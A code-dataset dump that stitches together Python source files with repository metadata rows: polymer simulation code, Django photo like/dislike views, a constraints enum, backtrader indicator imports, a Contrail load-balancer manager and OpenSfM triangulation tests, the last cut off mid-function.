p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
else:
print('reference molecule has no head or tail')
n = m_.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
s.add(n, change_dim=False)
s.add_particle_bonding()
head = last_head
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
s.make_new_bonds(head, tail, f)
temp_nmon += 1
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
if unwrap:
s.unwrap()
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (temp_nmon)
sim.run(np=settings.get('np'))
if unwrap:
s.unwrap()
if unwrap:
s.wrap()
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
if temp_nmon >= nmon:
break
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
def random_walk(m, nmon, s_=None, **kwargs):
m = m.copy()
extra_bonds = kwargs.get('extra_bonds', False)
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
m.add_particle_bonding()
for p in m.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m.remove_linker_types()
if s_ is None:
s = system.replicate(m, 1, density=density/nmon)
else:
s = system.replicate(m, 1, s_=s_, density=None)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
if traj:
s.write_xyz('random_walk.xyz')
if capped:
m.particles.remove(1)
m.remove_spare_bonding()
m.add_particle_bonding()
for insertion in range(nmon - 1):
head = None
tail = None
backbone_vector = np.array(find_last_backbone_vector(s, m))
for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
p_.x = p.x + 3*backbone_vector[0]
p_.y = p.y + 3*backbone_vector[1]
p_.z = p.z + 3*backbone_vector[2]
n = m.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
if extra_bonds:
heads = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
heads.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
head = p
s.add(n, change_dim=False)
s.add_particle_bonding()
if extra_bonds:
tails = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tails.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
for p in s.particles:
if not p.bonded_to:
print(p.tag)
if head and tail:
s.make_new_bonds(head, tail, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
elif extra_bonds and len(heads) == len(tails):
for h, t in izip(heads, tails):
s.make_new_bonds(h, t, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
else:
print('cannot find head and tail')
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (insertion+2)
sim.run(np=settings.get('np'))
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
| true | true |
f72eb557881c37baab88b43f249c035716e84b5c | 963 | py | Python | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
    """Return all photos, ordered by unsplash id, as a JSON array.

    Only GET is allowed; any other method receives a 405 response.
    """
    if request.method == 'GET':
        photos = Photo.objects.all().order_by('unsplash_id')
        # safe=False is required because the top-level JSON value is a list.
        return JsonResponse([p.to_dict() for p in photos], safe=False)
    # Fix: the original returned the HttpResponseNotAllowed *class*; it must
    # be instantiated with the list of permitted methods.
    return HttpResponseNotAllowed(['GET'])
@csrf_exempt
def like_photo(request, pk: int):
    """Atomically increment the like counter of photo *pk* (PATCH only)."""
    if request.method == 'PATCH':
        # Fetch and increment inside one transaction to avoid lost updates.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_like()
        return JsonResponse(photo.to_dict())
    # Fix: return an HttpResponseNotAllowed instance (with the allowed
    # methods), not the class itself.
    return HttpResponseNotAllowed(['PATCH'])
@csrf_exempt
def dislike_photo(request, pk: int):
    """Atomically increment the dislike counter of photo *pk* (PATCH only)."""
    if request.method == 'PATCH':
        # Fetch and increment inside one transaction to avoid lost updates.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_dislike()
        return JsonResponse(photo.to_dict())
    # Fix: return an HttpResponseNotAllowed instance (with the allowed
    # methods), not the class itself.
    return HttpResponseNotAllowed(['PATCH'])
| 26.75 | 81 | 0.687435 | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
if request.method == 'GET':
photos = Photo.objects.all().order_by('unsplash_id')
return JsonResponse(list(map(lambda p: p.to_dict(), photos)), safe=False)
return HttpResponseNotAllowed
@csrf_exempt
def like_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_like()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
@csrf_exempt
def dislike_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_dislike()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
| true | true |
f72eb561be479318fbf20e59f9be7488fc76b552 | 221 | py | Python | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | 20 | 2021-12-31T15:28:20.000Z | 2022-02-15T18:24:16.000Z | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class Constraints(Enum):
    """Validation constraints that can be attached to a value.

    Member values come from ``auto()`` and carry no meaning beyond
    identity; the actual validation logic lives in the consumer of this
    enum, not here.
    """
    not_empty = auto()        # value must not be empty
    greater_than_0 = auto()   # numeric value must be > 0
    not_null = auto()         # value must not be None/null
    is_email = auto()         # value must look like an e-mail address
    is_uri = auto()           # value must look like a URI
    after_now = auto()        # timestamp must lie in the future
    before_now = auto()       # timestamp must lie in the past
| 18.416667 | 27 | 0.606335 | from enum import Enum, auto
class Constraints(Enum):
    """Validation constraints that can be attached to a value.

    Member values come from ``auto()`` and carry no meaning beyond
    identity; the actual validation logic lives in the consumer of this
    enum, not here.
    """
    not_empty = auto()        # value must not be empty
    greater_than_0 = auto()   # numeric value must be > 0
    not_null = auto()         # value must not be None/null
    is_email = auto()         # value must look like an e-mail address
    is_uri = auto()           # value must look like a URI
    after_now = auto()        # timestamp must lie in the future
    before_now = auto()       # timestamp must lie in the past
| true | true |
f72eb585890bafe8941f0c78a9d950477be13230 | 2,555 | py | Python | backtrader/backtrader/indicators/__init__.py | harshabakku/live-back-testing-trader | 1fd69c7598dc15bea740f160eed886f396bcba2c | [
"MIT"
] | 1 | 2021-07-14T22:04:08.000Z | 2021-07-14T22:04:08.000Z | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | null | null | null | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | 3 | 2021-03-07T16:29:40.000Z | 2022-03-17T21:42:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import Indicator
from backtrader.functions import *
# The modules below should/must define __all__ with the Indicator objects
# of prepend an "_" (underscore) to private classes/variables
from .basicops import *
# base for moving averages
from .mabase import *
# moving averages (so envelope and oscillators can be auto-generated)
from .sma import *
from .ema import *
from .smma import *
from .wma import *
from .dema import *
from .kama import *
from .zlema import *
from .hma import *
from .zlind import *
from .dma import *
# depends on moving averages
from .deviation import *
# depend on basicops, moving averages and deviations
from .atr import *
from .aroon import *
from .bollinger import *
from .cci import *
from .crossover import *
from .dpo import *
from .directionalmove import *
from .envelope import *
from .heikinashi import *
from .lrsi import *
from .macd import *
from .momentum import *
from .oscillator import *
from .percentchange import *
from .percentrank import *
from .pivotpoint import *
from .prettygoodoscillator import *
from .priceoscillator import *
from .psar import *
from .rsi import *
from .stochastic import *
from .trix import *
from .tsi import *
from .ultimateoscillator import *
from .williams import *
from .rmi import *
from .awesomeoscillator import *
from .accdecoscillator import *
from .dv2 import * # depends on percentrank
# Depends on Momentum
from .kst import *
from .ichimoku import *
from .hurst import *
from .ols import *
from .hadelta import *
| 28.076923 | 79 | 0.699413 | true | true | |
f72eb6919b6ff61569dadd031bc009867b1f62b7 | 8,984 | py | Python | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
    # 400-class error raised when a pool is configured with an unsupported
    # load-balancing method. NOTE: ``_`` is assumed to be the translation
    # function installed globally by neutron's i18n setup — it is not
    # imported in this module; confirm when running outside neutron.
    message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
    """Base class for managers that map a neutron load-balancer resource
    onto the corresponding object in the contrail API server.

    A concrete subclass implements the abstract hooks below for one
    resource type (read/list/update/delete plus dict conversion); this
    class provides the shared GET/LIST/UPDATE/DELETE plumbing, tenant
    authorization checks and filtering.
    """

    # How many times _project_read() polls before declaring the project
    # unavailable.
    _max_project_read_attempts = 3

    def __init__(self, api):
        # Contrail VNC API client used for all object operations.
        self._api = api

    @abstractproperty
    def property_type_mapping(self):
        """ Mapping from property name to neutron dict key.
        """
        pass

    @abstractmethod
    def make_properties(self, resource):
        """ Returns the properties for the specified resource.
        """
        pass

    @abstractmethod
    def make_dict(self, resource, fields):
        """ Return the contrail api resource in the dictionary format
        expected by neutron.
        """
        pass

    @abstractmethod
    def resource_read(self, id):
        """ Read the specified resource from the api server.
        """
        pass

    @abstractmethod
    def resource_list(self, tenant_id):
        """ Returns the list of objects from the api server.
        """
        pass

    @abstractmethod
    def resource_update(self, obj):
        """ Call the update method.
        """
        pass

    @abstractmethod
    def resource_delete(self, id):
        """ Delete the specified resource from the api server.
        """
        pass

    @abstractproperty
    def get_exception_notfound(self, id):
        """ Returns the correct NotFound exception.
        """
        pass

    @abstractproperty
    def get_exception_inuse(self, id):
        # Docstring fixed: the original said "NotFound" (copy-paste error);
        # this hook is raised from delete() on RefsExistError.
        """ Returns the correct InUse exception.
        """
        pass

    @abstractproperty
    def neutron_name(self):
        """ Resource name in a request from neutron.
        """
        pass

    @abstractproperty
    def resource_name_plural(self):
        """ Resource list name in a list response from api server.
        """
        pass

    @abstractmethod
    def create(self, context, resource):
        """ Create resource.
        """
        pass

    @abstractmethod
    def update_properties(self, obj, id, resource):
        """ Update the resource properties.

        Returns True when something changed (see update()), False
        otherwise.
        """
        return False

    def update_object(self, obj, id, resource):
        """ Update object metadata other than properties.

        Returns True when something changed, False otherwise.
        """
        return False

    def _get_tenant_id_for_create(self, context, resource):
        """ Return the tenant id that should own a new resource.

        A non-admin may only create resources for its own tenant;
        violating that raises AdminRequired.
        """
        if context.is_admin and 'tenant_id' in resource:
            tenant_id = resource['tenant_id']
        elif ('tenant_id' in resource and
              resource['tenant_id'] != context.tenant_id):
            reason = 'Cannot create resource for another tenant'
            raise n_exc.AdminRequired(reason=reason)
        else:
            tenant_id = context.tenant_id
        return tenant_id

    def _get_resource_name(self, resource, parent, name, uuid):
        """ Generate an unique name. This is display name if there are
        no conflicts or display_name + uuid.
        """
        fq_name = list(parent.fq_name)
        fq_name.append(name)
        try:
            # Only probe for an existing object with this fq_name; the
            # resolved id itself is not needed (unused assignment removed).
            self._api.fq_name_to_id(resource, fq_name)
        except NoIdError:
            return name
        return name + '-' + uuid

    def _is_authorized(self, context, resource):
        # Admins may touch anything; others only their own tenant's
        # resources.
        return context.is_admin or context.tenant_id == resource['tenant_id']

    def _project_read(self, project_id):
        """ Read the project from the api server, retrying to give an
        external process a chance to create it if it does not yet exist.

        Raises TenantNetworksDisabled when the project never appears.
        """
        for _ in range(self._max_project_read_attempts):
            try:
                return self._api.project_read(id=str(uuid.UUID(project_id)))
            except NoIdError:
                pass
            greenthread.sleep(1)
        raise n_exc.TenantNetworksDisabled()

    def _fields(self, resource, fields):
        """ Restrict *resource* to the requested *fields*; no-op when
        fields is empty or None.
        """
        if fields:
            return dict(((key, item) for key, item in resource.items()
                         if key in fields))
        return resource

    def _apply_filter(self, resource, filters):
        """ Return True when *resource* matches every filter value set. """
        if filters is None:
            return True
        # .items() instead of the py2-only .iteritems(), for consistency
        # with _fields() above and python 3 compatibility.
        for key, value in filters.items():
            if key in resource and not resource[key] in value:
                return False
        return True

    def _get_object_status(self, obj):
        # An enabled id_perms block means the object is live.
        id_perms = obj.get_id_perms()
        if id_perms and id_perms.enable:
            return constants.ACTIVE
        return constants.PENDING_DELETE

    def _get_object_description(self, obj):
        id_perms = obj.get_id_perms()
        if id_perms is None:
            return None
        return id_perms.description

    def _get_object_tenant_id(self, obj):
        # The first two components of the fq_name identify the project.
        proj_fq_name = obj.get_fq_name()[0:2]
        try:
            proj = self._api.project_read(fq_name=proj_fq_name)
        except NoIdError:
            return None
        return proj.uuid

    def get_resource(self, context, id, fields=None):
        """ Implement GET by uuid.
        """
        try:
            obj = self.resource_read(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        tenant_id = str(uuid.UUID(context.tenant_id))
        project_id = self._get_object_tenant_id(obj)
        if not context.is_admin and tenant_id != project_id:
            # Report other tenants' resources as not-found rather than
            # revealing their existence.
            raise self.get_exception_notfound(id=id)
        return self.make_dict(obj, fields)

    def _get_resource_dict(self, uuid, filters, fields):
        """ Read one object and convert it to a (filtered) neutron dict;
        returns None when it is missing or filtered out.
        """
        try:
            obj = self.resource_read(id=uuid)
        except NoIdError:
            return None
        res = self.make_dict(obj, None)
        if not self._apply_filter(res, filters):
            return None
        return self._fields(res, fields)

    def get_collection(self, context, filters=None, fields=None):
        """ Generic implementation of list command.
        """
        response = []
        if filters and 'id' in filters:
            # Fast path: read only the explicitly requested ids.
            for v in filters['id']:
                res = self._get_resource_dict(v, filters, fields)
                if res is not None and self._is_authorized(context, res):
                    response.append(res)
            return response
        tenant_id = None
        if not context.is_admin:
            tenant_id = context.tenant_id
        obj_list = self.resource_list(tenant_id=tenant_id)
        if self.resource_name_plural not in obj_list:
            return response
        for v in obj_list[self.resource_name_plural]:
            res = self._get_resource_dict(v['uuid'], filters, fields)
            if res is not None:
                response.append(res)
        return response

    def delete(self, context, id):
        """ Delete the object, enforcing that non-admins may only delete
        their own tenant's resources.
        """
        if not context.is_admin:
            try:
                obj = self.resource_read(id=id)
            except NoIdError:
                raise self.get_exception_notfound(id=id)
            tenant_id = str(uuid.UUID(context.tenant_id))
            project_id = self._get_object_tenant_id(obj)
            if tenant_id != project_id:
                raise n_exc.NotAuthorized()
        try:
            self.resource_delete(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        except RefsExistError:
            # Still referenced by other objects.
            raise self.get_exception_inuse(id=id)

    def update_properties_subr(self, props, resource):
        """ Update the DB properties object from the neutron parameters.

        Returns True when at least one property changed.
        """
        change = False
        # .items() instead of .iteritems() (consistency / py3 compat).
        for key, mapping in self.property_type_mapping.items():
            if mapping not in resource:
                continue
            if getattr(props, key) != resource[mapping]:
                setattr(props, key, resource[mapping])
                change = True
        return change

    def update(self, context, id, resource):
        """ Update the resource.
        """
        try:
            obj = self.resource_read(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        id_perms = obj.get_id_perms()
        if not id_perms or not id_perms.enable:
            # Objects marked for deletion may not be updated.
            raise loadbalancer.StateInvalid(id=id,
                                            state=constants.PENDING_DELETE)
        r = resource[self.neutron_name]
        if r:
            update = False
            if 'description' in r and id_perms.description != r['description']:
                id_perms.description = r['description']
                obj.set_id_perms(id_perms)
                update = True
            if self.update_properties(obj, id, r):
                update = True
            if self.update_object(obj, id, r):
                update = True
            if update:
                self.resource_update(obj)
        return self.make_dict(obj)
| 30.662116 | 79 | 0.598508 |
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
pass
@abstractmethod
def make_properties(self, resource):
pass
@abstractmethod
def make_dict(self, resource, fields):
pass
@abstractmethod
def resource_read(self, id):
pass
@abstractmethod
def resource_list(self, tenant_id):
pass
@abstractmethod
def resource_update(self, obj):
pass
@abstractmethod
def resource_delete(self, id):
pass
@abstractproperty
def get_exception_notfound(self, id):
pass
@abstractproperty
def get_exception_inuse(self, id):
pass
@abstractproperty
def neutron_name(self):
pass
@abstractproperty
def resource_name_plural(self):
pass
@abstractmethod
def create(self, context, resource):
pass
@abstractmethod
def update_properties(self, obj, id, resource):
return False
def update_object(self, obj, id, resource):
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
def get_collection(self, context, filters=None, fields=None):
response = []
if filters and 'id' in filters:
for v in filters['id']:
res = self._get_resource_dict(v, filters, fields)
if res is not None and self._is_authorized(context, res):
response.append(res)
return response
tenant_id = None
if not context.is_admin:
tenant_id = context.tenant_id
obj_list = self.resource_list(tenant_id=tenant_id)
if self.resource_name_plural not in obj_list:
return response
for v in obj_list[self.resource_name_plural]:
res = self._get_resource_dict(v['uuid'], filters, fields)
if res is not None:
response.append(res)
return response
def delete(self, context, id):
if not context.is_admin:
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if tenant_id != project_id:
raise n_exc.NotAuthorized()
try:
self.resource_delete(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
except RefsExistError:
raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
def update(self, context, id, resource):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
id_perms = obj.get_id_perms()
if not id_perms or not id_perms.enable:
raise loadbalancer.StateInvalid(id=id,
state=constants.PENDING_DELETE)
r = resource[self.neutron_name]
if r:
update = False
if 'description' in r and id_perms.description != r['description']:
id_perms.description = r['description']
obj.set_id_perms(id_perms)
update = True
if self.update_properties(obj, id, r):
update = True
if self.update_object(obj, id, r):
update = True
if update:
self.resource_update(obj)
return self.make_dict(obj)
| true | true |
f72eb75b52c1111f421c3e6bb21b6e69eee64a93 | 2,707 | py | Python | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | null | null | null | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T22:22:02.000Z | 2022-03-12T00:47:52.000Z | opensfm/test/test_triangulation.py | smarvar/sfm_smarvar | 569144c26df860cfa45d183f7701d0414e35d086 | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
    """Test triangulating tracks of spherical images."""
    # Track '1' is observed in two shots. The Observation arguments look
    # like (x, y, scale, r, g, b, feature_id) — assumed from usage here,
    # confirm against pysfm.Observation.
    tracks_manager = pysfm.TracksManager()
    tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
    tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
    # Two shots with the same equirectangular camera, differing only in
    # translation ([-1, 0, 0]), which provides the baseline needed for
    # triangulation.
    rec = io.reconstruction_from_json({
        "cameras": {
            "theta": {
                "projection_type": "equirectangular",
                "width": 800,
                "height": 400,
            }
        },
        "shots": {
            'im1': {
                "camera": "theta",
                "rotation": [0.0, 0.0, 0.0],
                "translation": [0.0, 0.0, 0.0],
            },
            'im2': {
                "camera": "theta",
                "rotation": [0, 0, 0.0],
                "translation": [-1, 0, 0.0],
            },
        },
        "points": {
        },
    })
    triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
    # Thresholds: 0.01 reprojection error, 2.0 minimum ray angle
    # (presumably degrees — confirm against TrackTriangulator.triangulate).
    triangulator.triangulate('1', 0.01, 2.0)
    assert '1' in rec.points
    p = rec.points['1'].coordinates
    assert np.allclose(p, [0, 0, 1.3763819204711])
    # Both observations must be attached to the reconstructed point.
    assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
    """Return *x* scaled to unit Euclidean length, as a numpy array."""
    vec = np.array(x)
    return vec / np.linalg.norm(vec)
def test_triangulate_bearings_dlt():
    """DLT triangulation from two posed bearings recovers the point."""
    # Camera poses as 3x4 [R|t] matrices: identity rotations, one unit of
    # baseline along x between the two cameras.
    pose_a = np.hstack((np.identity(3), [[0], [0], [0]]))
    pose_b = np.hstack((np.identity(3), [[-1], [0], [0]]))
    bearing_a = unit_vector([0.0, 0, 1])
    bearing_b = unit_vector([-1.0, 0, 1])
    threshold = 0.01              # max reprojection error
    min_angle = np.radians(2.0)   # minimum ray angle
    res, X = pygeometry.triangulate_bearings_dlt(
        [pose_a, pose_b], [bearing_a, bearing_b], threshold, min_angle)
    assert res is True
    assert np.allclose(X, [0, 0, 1.0])
def test_triangulate_bearings_midpoint():
    """Midpoint triangulation from two origins/bearings recovers the point."""
    origins = [np.array([0.0, 0, 0]), np.array([1.0, 0, 0])]
    bearings = [unit_vector([0.0, 0, 1]), unit_vector([-1.0, 0, 1])]
    threshold = 0.01              # per-bearing max reprojection error
    min_angle = np.radians(2.0)   # minimum ray angle
    res, X = pygeometry.triangulate_bearings_midpoint(
        origins, bearings, 2 * [threshold], min_angle)
    assert res is True
    assert np.allclose(X, [0, 0, 1.0])
def test_triangulate_two_bearings_midpoint():
    """Two-bearing midpoint triangulation recovers the expected point."""
    o1 = np.array([0.0, 0, 0])
    b1 = unit_vector([0.0, 0, 1])
    o2 = np.array([1.0, 0, 0])
    b2 = unit_vector([-1.0, 0, 1])
    # Unlike the other triangulation entry points, this one takes only the
    # origins and bearings; the unused reprojection/ray-angle locals that
    # were copy-pasted from the sibling tests have been removed.
    X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
    assert np.allclose(X, [0, 0, 1.0])
| 30.41573 | 91 | 0.569634 | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
